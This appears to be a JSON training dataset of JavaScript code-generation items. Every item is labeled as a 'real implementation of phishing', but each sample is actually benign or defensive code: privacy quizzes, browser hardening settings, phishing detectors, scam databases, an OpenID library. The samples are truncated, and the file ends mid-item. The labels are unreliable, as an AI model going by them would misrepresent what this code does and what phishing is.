File size: 72,087 Bytes
36d694e |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 |
[
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/* Author: Selvahini Kamalarajan \r\nDate: December 5, 2023 \r\nFile Name: script \r\nDescription: Informational website about the implications of privacy and information technology usage *\/\r\n\r\nfunction phishing() {\r\n \/\/ Function to display correct answer for phishing email question\r\n var question = document.quiz2.question.value;\r\n\r\n if (question == \"yes\") {\r\n document.getElementById(\"message\").innerHTML = \"Correct! This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate.\";\r\n }\r\n\r\n if (question == \"no\") {\r\n document.getElementById(\"message\").innerHTML = \"Incorrect. This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate. Your privacy can be compromised due to malicious script activities.\";\r\n }\r\n document.getElementById(\"after_submit\").style.visibility = \"visible\"; \/\/Set element visibility to visible \r\n}\r\n\r\nfunction check() {\r\n \/\/ Function to check answers for Privacy Policy Question\r\n var question = document.quiz.question.value;\r\n\r\n \/\/ Output message and picture if user answers yes\/no\r\n if (question == \"yes\") {\r\n document.getElementById(\"message\").innerHTML = \"Nice! You are one of 9% of people who read privacy policies often.\";\r\n document.getElementById(\"picture\").src = \"policy.png\";\r\n }\r\n\r\n if (question == \"no\") {\r\n document.getElementById(\"message\").innerHTML = \"Just like you, 91% of consumers accept the terms and conditions without reading them.\";\r\n document.getElementById(\"picture\").src = \"policies-stats.jpg\";\r\n }\r\n document.getElementById(\"after_submit\").style.visibility = \"visible\";\r\n}\r\n\r\nfunction checkAns() {\r\n \/\/ Function to check answers for quiz \r\n var correctAns = [\"b\", \"b\", \"a\", \"d\", \"b\", \"d\", \"b\", \"b\", \"c\", \"d\"]; \r\n\r\n var correct = 0;\r\n \r\n var questions = [document.quiz.q1.value, document.quiz.q2.value, document.quiz.q3.value, documen",
"language":"Javascript",
"repo_name":"selvxhini-10\/PersonalPrivacyWebsite",
"timestamp":"2025-05-22T22:01:00.115247",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/\n\/******************************************************************************\n * user.js *\n * https:\/\/github.com\/pyllyukko\/user.js *\n ******************************************************************************\/\n\n\/******************************************************************************\n * SECTION: HTML5 \/ APIs \/ DOM *\n ******************************************************************************\/\n\n\/\/ PREF: Disable Service Workers\n\/\/ https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/Worker\n\/\/ https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/ServiceWorker_API\n\/\/ https:\/\/wiki.mozilla.org\/Firefox\/Push_Notifications#Service_Workers\n\/\/ NOTICE: Disabling ServiceWorkers breaks functionality on some sites (Google Street View...)\n\/\/ NOTICE: Disabling ServiceWorkers breaks Firefox Sync\n\/\/ Unknown security implications\n\/\/ CVE-2016-5259, CVE-2016-2812, CVE-2016-1949, CVE-2016-5287 (fixed)\nuser_pref(\"dom.serviceWorkers.enabled\",\t\t\t\tfalse);\n\n\/\/ PREF: Disable web notifications\n\/\/ https:\/\/support.mozilla.org\/en-US\/questions\/1140439\nuser_pref(\"dom.webnotifications.enabled\",\t\t\tfalse);\n\n\/\/ PREF: Disable DOM timing API\n\/\/ https:\/\/wiki.mozilla.org\/Security\/Reviews\/Firefox\/NavigationTimingAPI\n\/\/ https:\/\/www.w3.org\/TR\/navigation-timing\/#privacy\n\/\/ NOTICE: Disabling DOM timing API breaks item pages in AliExpress (https:\/\/github.com\/pyllyukko\/user.js\/issues\/561)\nuser_pref(\"dom.enable_performance\",\t\t\t\tfalse);\n\n\/\/ PREF: Disable resource timing API\n\/\/ https:\/\/www.w3.org\/TR\/resource-timing\/#privacy-security\n\/\/ NOTICE: Disabling resource timing API breaks some DDoS protection pages (Cloudflare)\nuser_pref(\"dom.enable_resource_timing\",\t\t\t\tfalse);\n\n\/\/ PREF: Make sure the User Timing API does not provide a new high resolution timestamp\n\/\/ https:\/\/trac.torproject.org\/projects\/tor\/ticket\/16336\n\/\/ https:\/\/www.w3.org\/TR\/2013\/REC-user-timing-2",
"language":"Javascript",
"repo_name":"pyllyukko\/user.js",
"timestamp":"2025-05-22T22:01:00.249678",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"export class PhishingDetector {\n constructor() {\n \/\/ No need to check for ai.languageModel here\n \/\/ We'll handle capability checks when we use the model\n }\n\n async calculateScore(emailContent) {\n try {\n \/\/ Log emailContent for debugging\n console.log('Email content received:', emailContent);\n\n const features = this.analyzeEmailFeatures(emailContent);\n\n \/\/ Check if the language model is available\n const capabilities = await ai.languageModel.capabilities();\n\n if (capabilities.available !== \"readily\") {\n console.warn('Language model is not readily available');\n\n if (capabilities.consent === \"granted\") {\n console.log('Consent already granted.');\n } else if (capabilities.consent === \"requirable\") {\n \/\/ Request user consent\n const consentResult = await ai.languageModel.requestConsent();\n if (!consentResult) {\n console.warn('User did not grant consent');\n return 50; \/\/ Return a default score or handle accordingly\n } else {\n console.log('User granted consent.');\n }\n } else {\n console.warn('Consent is not available.');\n return 50; \/\/ Return a default score or handle accordingly\n }\n }\n\n \/\/ Generate the prompt\n const prompt = `\n \nInstructions:\n- Considering the above information, assign a phishing likelihood score and provide a detailed explanation.\n- Use English and Arabic numerals.\n- Return the result in the format \"The score is the following: X\", where X is a number between 0 and 100.\nAnalyze this email for phishing indicators and provide a response in the following format:\n\nThe score is the following: X\n\nThe explanation is: [Your detailed analysis here]\nEnd of explanation.\n\nConsider these factors:\n- Urgency or pressure tactics\n- Grammar and spelling errors\n- Suspicious links or attachments\n- Requests for sensitive information\n- Mismatched or fake sender addresses\n- Time sent ",
"language":"Javascript",
"repo_name":"Dalosuuu\/GmailPhishGuardian_AI",
"timestamp":"2025-05-22T22:01:00.434292",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"'use strict'\n\nconst chromeLauncher = require('chrome-launcher')\nconst path = require('path')\n\n\/\/ Borrow from here:\n\/\/ https:\/\/github.com\/GoogleChrome\/puppeteer\/blob\/master\/lib\/Launcher.js#L30\nconst DEFAULT_ARGS = [\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-client-side-phishing-detection',\n '--disable-default-apps',\n '--disable-hang-monitor',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-sync',\n '--enable-automation',\n '--enable-devtools-experiments',\n '--metrics-recording-only',\n '--no-first-run',\n '--password-store=basic',\n '--safebrowsing-disable-auto-update',\n '--use-mock-keychain',\n]\n\n\/\/ borrow from: http:\/\/qiita.com\/saekis\/items\/c2b41cd8940923863791\nfunction escapeHtml (string) {\n if (typeof string !== 'string') {\n return string\n }\n return string.replace(\/[&'`\"<>]\/g, function (match) {\n return {\n '&': '&',\n '\\'': ''',\n '`': '`',\n '\"': '"',\n '<': '<',\n '>': '>',\n }[match]\n })\n}\n\nfunction escapeSingleQuote (string) {\n if (typeof string !== 'string') {\n return string\n }\n return string.replace(\/'\/g, '\\\\\\'')\n}\n\nfunction escapeNewLine (string) {\n return string.replace(\/\\r?\\n\/g, '\\\\n')\n}\n\nasync function createChromeLauncher (startingUrl, options) {\n const flags = [].concat(DEFAULT_ARGS)\n let chromeInstance\n\n \/\/ Lighthouse adds '--disable-setuid-sandbox' flag automatically.\n \/\/ The flag causes an error on linux when staring headless chrome.\n \/\/ '--no-sandbox' suppresses an error caused by '--disable-setuid-sandbox'.\n if (process.platform === 'linux') {\n flags.push('--no-sandbox')\n }\n if (!options.visible) {\n flags.push('--headless')\n flags.push('--hide-scrollbars')\n flags.push('--mute-audio')\n }\n if (options.chromeFlags && Array.isArray(options.chromeFlags)) {\n options.chromeFlags.forEach(f => {\n if (f.indexOf('--') === -1) {\n throw new Error('An item of chromFlags option",
"language":"Javascript",
"repo_name":"OnetapInc\/chromy",
"timestamp":"2025-05-22T22:01:00.573851",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/ eslint-disable-next-line no-undef\ndocute.init({\n debug: true,\n title: 'Spam Scanner',\n repo: 'spamscanner\/spamscanner',\n 'edit-link': 'https:\/\/github.com\/spamscanner\/spamscanner\/tree\/master\/',\n twitter: 'niftylettuce',\n nav: {\n default: [\n {\n title:\n 'The best anti-spam, email filtering, and phishing prevention service.',\n path: '\/'\n }\n ]\n },\n \/\/ eslint-disable-next-line no-undef\n plugins: [docuteEmojify()]\n});\n",
"language":"Javascript",
"repo_name":"spamscanner\/spamscanner",
"timestamp":"2025-05-22T22:01:00.710474",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\n\n\/\/ this is the code which will be injected into a given page...\nvar config = {\n apiKey: \"AIzaSyD1FfiwIWzbbn0rhqQg6ZF2KzVBOiqU7oQ\",\n authDomain: \"phish-ai-production.firebaseapp.com\",\n databaseURL: \"https:\/\/phish-ai-production.firebaseio.com\",\n projectId: \"phish-ai-production\",\n storageBucket: \"gs:\/\/phish-ai-production.appspot.com\/\",\n messagingSenderId: \"976092427021\"\n};\nfirebase.initializeApp(config);\nvar db = firebase.firestore();\n\n\nfunction open_options_page() {\n chrome.tabs.create({'url': \"\/options.html\" } )\n};\n\nfunction open_demo_page() {\n chrome.tabs.create({'url': \"https:\/\/www.phish.ai\/request-a-demo\" } )\n};\n\nfunction restore_popup() {\n chrome.storage.local.get({\n idnEnable: true,\n aiEnable: true\n }, function(items) {\n if (!items.aiEnable) {\n document.getElementById('zero_day_disabled').style.display = \"\"\n }\n if (!items.idnEnable) {\n document.getElementById('idn_disabled').style.display = \"\"\n }\n var bg = chrome.extension.getBackgroundPage();\n var query = {active: true, currentWindow: true};\n chrome.tabs.query(query, function callback(tabs) {\n if (items.idnEnable) {\n var currentTab = tabs[0]; \/\/ there will be only one in this array\n var hostname = bg.extractHostname(currentTab.url);\n var domain = document.getElementById('domain');\n var idn_status = document.getElementById('idn_status');\n if (bg.isDomainIDN(hostname)) {\n domain.className = 'badge badge-danger';\n idn_status.className = 'badge badge-danger';\n idn_status.innerHTML = 'IDN Detected';\n }\n domain.innerHTML = hostname;\n }\n\n if (items.aiEnable) {\n if (currentTab.id in bg.tabMalicious) {\n var zero_day = document.getElementById('zero_day');\n var ta",
"language":"Javascript",
"repo_name":"phishai\/phish-protect",
"timestamp":"2025-05-22T22:01:00.830022",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"respecConfig.localBiblio = {\n\t\"aicaptcha\": {\n\t\t\"title\": \"aiCaptcha: Using AI to beat CAPTCHA and post comment spam\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [\"Casey Chesnut\"],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"http:\/\/www.brains-n-brawn.com\/default.aspx?vDir=aicaptcha\"\n\t},\n\n \"able-gamers\": {\n \"title\": \"Thought On Accessibility and VR\",\n \"date\": \"March, 2017\",\n \"authors\": [\"AJ Ryan\"],\n \"editors\": [],\n \"etAl\": false,\n \"publisher\": \"\",\n \"href\": \"https:\/\/ablegamers.org\/thoughts-on-accessibility-and-vr\/\"\n },\n\n\t\"antiphishing\": {\n\t\t\"title\": \"Phishing Activity Trends Report\",\n\t\t\"date\": \"July, 2005\",\n\t\t\"authors\": [],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"Anti-Phishing Working Group\",\n\t\t\"href\": \"http:\/\/antiphishing.org\/APWG_Phishing_Activity_Report_Jul_05.pdf\"\n\t},\n\t\"breaking\": {\n\t\t\"title\": \"Breaking CAPTCHAs Without Using OCR\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [\"Howard Yeend\"],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"http:\/\/www.cs.berkeley.edu\/%7Emori\/gimpy\/gimpy.html\"\n\t},\n\t\"breakingocr\": {\n\t\t\"title\": \"Breaking CAPTCHAs Without Using OCR\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [\"Howard Yeend\"],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"http:\/\/www.puremango.co.uk\/cm_breaking_captcha_115.php\"\n\t},\n\t\"chafee\": {\n\t\t\"title\": \"17 USC 121, Limitations on exclusive rights: reproduction for blind or other people with disabilities (also known as the Chafee Amendment)\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"https:\/\/www.copyright.gov\/title17\/92chap1.html\"\n\t},\n \"captcha-ocr\": {\n\t\"title\": \"CAPTCHA: Attacks and Weaknesses against OCR technology\",\n\t\"date\": \"2013\",\n\t\"authors\": [\n\t \"Silky Azad\", \"Kiran Jain\"],\n\t\"publisher\": \"Journal of Computer science and Technology\",\n\t\"etAl\": false,\n\t\"editors\": [],\n\t\"href\": \"https:\/\/computerresearch.org\/index.php\/computer\/article\/download\/368\/368\"\n },\n \"information-security\": {\n\t\"ti",
"language":"Javascript",
"repo_name":"w3c\/apa",
"timestamp":"2025-05-22T22:01:01.006796",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"'use strict';\n\nconst fs = require('fs-extra');\nconst debug = require('debug')('app');\nconst express = require('express');\nconst csp = require('express-csp-header');\nconst frameguard = require('frameguard');\nconst xssFilter = require('x-xss-protection');\nconst bodyParser = require('body-parser');\nconst url = require('url');\nconst dateFormat = require('dateformat');\nconst {fork} = require('child_process');\nconst download = require('download-file');\nconst rimraf = require('rimraf');\nconst phishingDetector = require('eth-phishing-detect\/src\/detector');\nconst crypto = require(\"crypto\");\nconst request = require('request');\nconst app = express();\nconst config = require('.\/config');\nconst check = require('.\/_utils\/webcheck.js');\nconst lookup = require('.\/_utils\/lookup.js');\n\n\nlet default_template = fs.readFileSync('.\/_layouts\/default.html', 'utf8');\nlet cache;\nlet updating_now = false;\nlet icon_warnings = [];\nvar older_cache_time;\n\n\nif('perform_dns_lookup' in config && config.perform_dns_lookup === false) {\n default_template = default_template.replace(\"{{ config.perform_dns_lookup }}\", \"<div class='ui info message'>DNS lookups not performed due to configuration.<\/div><br \/>\");\n} else {\n default_template = default_template.replace(\"{{ config.perform_dns_lookup }}\", '');\n}\n\n\/* See if there's an up-to-date cache, otherwise run `update.js` to create one. *\/\nfunction getCache(callback = false) {\n if (!fs.existsSync('_cache\/cache.json')) {\n debug(\"No cache file found. Creating one...\");\n if (callback) {\n if (!updating_now) {\n updating_now = true;\n fork('update.js');\n }\n var checkDone = setInterval(function() {\n if (fs.existsSync('_cache\/cache.json')) {\n updating_now = false;\n cache = JSON.parse(fs.readFileSync('_cache\/cache.json'));\n clearInterval(checkDone);\n debug(\"Successfully updated cache!\");\n ",
"language":"Javascript",
"repo_name":"MrLuit\/EtherScamDB",
"timestamp":"2025-05-22T22:01:01.099275",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/**\n * Github\n * https:\/\/github.com\/6IX7ine\/certstreamcatcher\n * \n * Copyright (c) 2017 F\u00e1bio Castro\n * Licensed under the MIT license.\n *\/\n\n 'use strict'\n\n const tld = require('tldjs');\n const lodash = require('lodash');\n const color = require('cli-color');\n const status = require('node-status');\n const punycode = require('punycode');\n\n const yellow = color.yellow.underline;\n const danger = color.redBright.underline;\n const white = color.white.underline;\n\n const certificates = status.addItem('certificates');\n\n const mapping = {\n\n \"a\": [\"\u00e0\", \"\u00e1\", \"\u00e2\", \"\u00e3\", \"\u00e4\", \"\u00e5\", \"\u0101\", \"\u0103\", \"\u0105\", \"\u01ce\", \"\u0201\", \"\u0203\", \"\u0227\", \"\u1e01\", \"\u1e9a\", \"\u1ea1\"],\n \"b\": [\"\u1e03\", \"\u1e05\", \"\u1e07\", \"\u0180\"],\n \"c\": [\"\u00e7\", \"\u0107\", \"\u0109\", \"\u010b\", \"\u010d\"],\n \"d\": [\"\u1e0b\", \"\u1e0d\", \"\u1e0f\", \"\u1e11\", \"\u1e13\", \"\u0111\"],\n \"e\": [\"\u00e8\", \"\u00e9\", \"\u00ea\", \"\u00eb\", \"\u0115\", \"\u0117\", \"\u0119\", \"\u011b\", \"\u0205\", \"\u0207\", \"\u0229\", \"\u1e19\", \"\u1e1b\", \"\u1eb9\", \"\u1ebd\"],\n \"f\": [\"\u1e1f\"],\n \"g\": [\"\u011d\", \"\u011f\", \"\u0121\", \"\u0123\", \"\u01e7\", \"\u01f5\", \"\u1e21\"],\n \"h\": [\"\u0125\", \"\u021f\", \"\u1e23\", \"\u1e25\", \"\u1e27\", \"\u1e29\", \"\u1e2b\", \"\u1e96\"],\n \"i\": [\"\u00ec\", \"\u00ed\", \"\u00ee\", \"\u00ef\", \"\u0129\", \"\u012b\", \"\u012d\", \"\u012f\", \"\u01d0\", \"\u0209\", \"\u020b\", \"\u1e2d\", \"\u1ecb\"],\n \"j\": [\"\u0135\", \"\u01f0\"],\n \"k\": [\"\u0137\", \"\u01e9\", \"\u1e31\", \"\u1e33\", \"\u1e35\"],\n \"l\": [\"\u013a\", \"\u013c\", \"\u013e\", \"\u0140\", \"\u1e37\", \"\u1e3b\", \"\u1e3d\", \"\u03b9\", \"\u0142\"],\n \"m\": [\"\u1e3f\", \"\u1e41\", \"\u1e43\", \"\u03fb\"],\n \"n\": [\"\u00f1\", \"\u0144\", \"\u0146\", \"\u0148\", \"\u0149\", \"\u01f9\", \"\u1e45\", \"\u1e47\", \"\u1e49\", \"\u1e4b\"],\n \"o\": [\"\u00f2\", \"\u00f3\", \"\u00f4\", \"\u00f5\", \"\u00f6\", \"\u014d\", \"\u014f\", \"\u0151\", \"\u01a1\", \"\u01d2\", \"\u01eb\", \"\u1ed1\", \"\u020d\", \"\u020f\", \"\u022f\", \"\u1ecd\", \"\u00f8\", \"\u1ed9\"],\n \"p\": [\"\u1e55\", \"\u1e57\", \"\u03f8\"],\n \"r\": [\"\u0155\", \"\u0157\", \"\u0159\", \"\u0211\", \"\u0213\", \"\u1e59\", \"\u1e5b\", \"\u1e5f\", \"\u0491\"],\n \"s\": [\"\u015d\", \"\u015f\", \"\u0161\", \"\u0219\", \"\u1e61\", \"\u1e63\"],\n \"t\": [\"\u0163\", \"\u0165\", \"\u021b\", \"\u1e6b\", \"\u1e6d\", \"\u1e6f\", \"\u1e71\", \"\u1e97\"],\n \"u\": [\"\u00f9\", \"\u00fa\", \"\u00fb\", \"\u00fc\", \"\u0169\", \"\u016b\", \"\u016d\", \"\u016f\", \"\u0171\", \"\u0173\", \"\u01b0\", \"\u01d4\", \"\u0215\", \"\u0217\", \"\u1e73\", \"\u1e75\", \"\u1e77\", \"\u1ee5\"],\n \"v\": [\"\u1e7d\", \"\u1e7f\"],\n \"w\": [\"\u0175\", \"\u1e81\", \"\u1e83\", \"\u1e85\", \"\u1e87\", \"\u1e89\", \"\u1e98\"],\n \"x\": [\"\u1e8b\", \"\u1e8d\"],\n \"y\": [\"\u00fd\", \"\u00ff\", \"\u0177\", \"\u0233\", \"\u1e8f\", \"\u1e99\", \"\u1ef3\", \"\u1ef5\", \"\u1ef9\"],\n \"z\": [\"\u017a\", \"\u017c\", \"\u017e\", \"\u1e91\", \"\u1e93\", \"\u1e95\"]\n}\n\n module.exports = {\n\n \tcertstreamClientPhishing: function (certstream, regex, tlds, options) {\n\n \t\tthis.certstream = certstream;\n \t\tthis.regex = regex;\n \t\tthis.tlds = tlds;\n\n\n \t\tlet settings = { tlds: false };\n\n \t\tif (!op",
"language":"Javascript",
"repo_name":"jimywork\/certstreamcatcher",
"timestamp":"2025-05-22T22:01:01.244357",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/ Redirecting to links from the book:\n\/\/ https:\/\/nooffice.link\/REDIRECT\n\/\/ which translates to https:\/\/nooffice.org\/redirect?to=REDIRECT\n\nlet links = new Map([\n\n\/\/list of REDIRECT links\n['nooffice', 'https:\/\/nooffice.org'],\n\n\n\/\/chapter 19\n['ocr', 'https:\/\/en.wikipedia.org\/wiki\/Optical_character_recognition'],\n['evernote','https:\/\/Evernote.com'],\n['swiftscan', 'https:\/\/swiftscan.app\/en\/index.html'],\n['ios-scan', 'https:\/\/support.apple.com\/en-us\/HT210336'],\n['dropbox', 'https:\/\/www.dropbox.com'],\n['box', 'https:\/\/box.com'],\n['gdrive', 'https:\/\/drive.google.com'],\n['onedrive', 'https:\/\/www.microsoft.com\/en-us\/microsoft-365\/onedrive\/online-cloud-storage'],\n['iwork', 'https:\/\/www.apple.com\/iwork\/'],\n['gsheets', 'https:\/\/www.google.com\/sheets\/about\/'],\n['excel', 'https:\/\/www.microsoft.com\/en-us\/microsoft-365\/excel'],\n['mfa', 'https:\/\/en.wikipedia.org\/wiki\/Multi-factor_authentication'],\n['messages', 'https:\/\/support.apple.com\/explore\/messages'],\n['signal', 'https:\/\/www.signal.org'],\n['telegram', 'https:\/\/telegram.org'],\n['whatsapp', 'https:\/\/www.whatsapp.com'],\n['ipadonly', 'https:\/\/ipadonly.com\/book\/'],\n['vpn', 'https:\/\/en.wikipedia.org\/wiki\/Virtual_private_network'],\n['github', 'https:\/\/nooffice.org\/why-in-any-company-you-should-be-using-version-control-for-anything-how-we-use-github-not-only-bc2554308455\/'],\n\n\/\/chapter 20\n\n['conversation', 'https:\/\/en.wikipedia.org\/wiki\/A_Little_Less_Conversation'],\n['slack', 'https:\/\/slack.com'],\n['msteams', 'https:\/\/www.microsoft.com\/en-us\/microsoft-365\/microsoft-teams\/group-chat-software'],\n['cognitive', 'https:\/\/www.pnas.org\/content\/106\/37\/15583'], \n['digital-minimalism', 'https:\/\/www.calnewport.com\/books\/digital-minimalism\/'],\n\n\/\/chapter 21\n['offices', 'https:\/\/sliwinski.com\/tag\/office'],\n['cabinet', 'https:\/\/sliwinski.com\/declutter-your-desk-why-i-love-my-clutter-fre\/'],\n['stand', 'https:\/\/michael.team\/myoffice\/'],\n['whiteboard', 'https:\/\/sliwinski.com\/whiteboard\/'],\n\n\/\/chapter 22\n\n\n\/\/chapter 23\n['basecamphires', 'https:\/\/m.signa",
"language":"Javascript",
"repo_name":"Nozbe\/NoOffice.org",
"timestamp":"2025-05-22T22:01:01.359520",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/* OpenID for node.js\n *\n * http:\/\/ox.no\/software\/node-openid\n * http:\/\/github.com\/havard\/node-openid\n *\n * Copyright (C) 2010 by H\u00e5vard Stranden\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and\/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n *\n * -*- Mode: JS; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- \n * vim: set sw=2 ts=2 et tw=80 : \n *\/\n\nconst { access } = require('fs');\n\nvar Buffer = require('buffer').Buffer,\n crypto = require('crypto'),\n http = require('.\/http'),\n querystring = require('querystring'),\n url = require('url'),\n xrds = require('.\/lib\/xrds');\n\nvar _associations = {};\nvar _discoveries = {};\nvar _nonces = {};\n\nvar AX_MAX_VALUES_COUNT = 1000;\n\nvar openid = exports;\n\nvar _get = http.get;\nvar _post = http.post;\n\nfunction hasOwnProperty(obj, prop) {\n return Object.prototype.hasOwnProperty.call(obj, prop);\n}\n\nopenid.RelyingParty = function (returnUrl, realm, stateless, strict, extensions) {\n this.returnUrl = returnUrl;\n this.realm = realm || null;\n this.stateless = stateless;\n this.str",
"language":"Javascript",
"repo_name":"havard\/node-openid",
"timestamp":"2025-05-22T22:01:01.483356",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/If container already in DOM, remove it\nif(report.length > 0) report.remove();\n\n\/\/Container report\n\/*report = $('<div id=\"report\">\\\n\t\t\t<textarea id=\"reportv\" maxlength=\"150\" placeholder=\"Attention, les signalements abusifs, sans int\u00e9r\u00eat ou encore pour dire merci seront passible de sanction allant d\\'un simple avertissement au ban.\"><\/textarea>\\\n\t\t\t<\/div>');*\/\n\n\t\n\tbody.append('<div id=report> <\/div>');\n\t\n\treport = cacheSel('#report');\n\t\n\t\/\/Container, select subject \/ textarea \n\treport.html('<p>Selectionner le sujet de votre signalement<\/p>\\\n\t\t\t\t<ul>\\\n\t\t\t\t\t <li id=reDead><i class=\"fa fa-unlink\"> Liens morts<\/i><\/li>\\\n\t\t\t\t\t <li id=reForb><i class=\"fa fa-ban\"> Hors charte<\/i><\/li>\\\n\t\t\t\t\t <li id=reMove><i class=\"fa fa-share\"> A d\u00e9placer<\/i><\/li>\\\n\t\t\t\t\t <li id=reSecu><i class=\"fa fa-crosshairs\"> Virus\/Trojan\/Scam...<\/i><\/li>\\\n\t\t\t\t\t <li id=reHate><i class=\"fa fa-globe\"> Insulte envers un peuple\/religion\/minorit\u00e9...<\/i><\/li>\\\n\t\t\t\t\t <li id=rePers><i class=\"fa fa-eye-slash\"> Violation vie priv\u00e9e<\/i><\/li>\\\n\t\t\t\t\t <li id=reProt><i class=\"fa fa-child\"> Contenu p\u00e9dophile<\/i><\/li>\\\n\t\t\t\t\t <li id=reOthr><i class=\"fa fa-random\"> R\u00e9ouverture, r\u00e9solu, autres...<\/i><\/li>\\\n\t\t\t\t<\/ul>\\\n\t\t\t\t<textarea id=reportv placeholder=\"default\"><\/textarea>');\n\t\n\t\/\/Refresh caching\n\treport = cacheSel('#report');\n\treportv = cacheSel('#reportv');\n\t\n\t\/\/Hide the reportv until a subject get select\n\treportv.hide();\n\n\t\/\/Get 80% in px\n\tvar sizecal = $(window).width() * 0.8;\n\t\n\t\/\/Max width\n\tif(parseInt(sizecal) > 600) var sizecal = 600;\n\n\t\/\/Pop the container vote\n\treport.dialog({\n\t\twidth:sizecal,\n\t\tmodal:true,\n\t\tresizable: true,\n\t\ttitle:'Signalement',\n\t\tdialogClass:'modalNinja',\n\t\tshow:{effect:'scale', duration: 320},\n\t\tbuttons: [{\n\t\t\ttext: 'Confirmation',\n\t\t\tclick: function() {\n\n\t\t\t\t\/\/Subject \n\t\t\t\treps = reportv.attr('class'); \n\t\t\t\t\t\n\t\t\t\t\/\/Value textarea\n\t\t\t\trept = reportv.val();\n\t\t\t\t\n\t\t\t\t\/\/Less 10 chars return\n\t\t\t\tif(rept.length < 10) {\n\t\t\t\t\tcoloredInput(reportv,'errorSe','Minimum 10 caract\u00e8res');\n\t\t\t\t\treturn;\n",
"language":"Javascript",
"repo_name":"Anyon3\/ninjacms",
"timestamp":"2025-05-22T22:01:01.680023",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
